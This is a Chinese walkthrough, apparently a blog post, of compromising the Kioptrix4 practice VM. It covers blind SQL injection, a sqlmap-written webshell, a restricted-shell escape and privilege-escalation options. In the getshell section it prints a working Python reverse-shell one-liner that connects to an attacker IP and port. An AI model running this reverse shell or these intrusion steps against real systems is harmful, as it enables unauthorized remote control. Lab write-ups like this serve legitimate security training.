Kioptrix4靶机渗透

知识点

  • sql盲注
  • sqlmap写shell
  • 脏牛提权
  • udf提权

详细过程

信息搜集

  1. 首先端口扫描开放22,445,80,139端口。samba版本为3.0.28a,没有找到漏洞利用脚本。

  2. 80端口开放,是登陆界面。使用gobuster目录扫描,发现两个用户名john,robert,进去分别为两个php文件,没有有效信息。
    Kioptrix4靶机渗透_第1张图片

  3. 结合dirsearch发现database.sql文件,存在member表。使用密码登陆john没有成功。

    Kioptrix4靶机渗透_第2张图片

  4. 使用brupsuit尝试爆破用户密码。但坑点在于爆破一半后网站无法访问,应该是禁了我的windows的ip,只能用parrot了,(禁止无脑扫描:-),parrot能够正常访问。在爆破过程中发现一些报错信息。得到网站绝对路径/var/www.截包尝试sql注入:

    Kioptrix4靶机渗透_第3张图片
    存在bool盲注

  5. sql注入得到用户名和密码
    Kioptrix4靶机渗透_第4张图片

  6. 其实这里可以撞库登陆ssh。但当时没有想到。直接判断数据库用户是否为root权限

    Kioptrix4靶机渗透_第5张图片

    进而拿到webshell

    Kioptrix4靶机渗透_第6张图片

getshell

  1. 尝试nc反弹shell和bash反弹都没有成功,系统没有安装nc,使用python反弹成功。

    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.43.86',8989));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    

    Kioptrix4靶机渗透_第7张图片

  2. 在john.php文件发现mysql数据库用户名和密码,robert.php同样。

    Kioptrix4靶机渗透_第8张图片

  3. 在反弹过来的shell内执行mysql会直接中断,所以无法登陆数据库。后来又回到注入点尝试拿到root的密码,也没有成功。这时候就必须回到前面注入拿到的用户名和密码进行撞库,登陆john的ssh。

    Kioptrix4靶机渗透_第9张图片
    登陆成功但john的shell受到限制(robert同样的情况),之前也遇到过rshell,但应用在这里好像没啥用,因为能够使用的命令太少。

  4. 网上看到可以使用echo os.system('/bin/bash')绕过限制。

    Kioptrix4靶机渗透_第10张图片

提权

  1. 系统内核为2.6.24-24-server,可以尝试脏牛提权。ps查看进程发现mysql以root权限运行,也可以尝试udf提权。这两种提权方式我在之前的文章中都有演示。需要特别注意的是本机器为32位系统,一些提权exp编译时需要加-m32参数。

  2. 最后

    Kioptrix4靶机渗透_第11张图片

你可能感兴趣的:(渗透测试,靶场测试)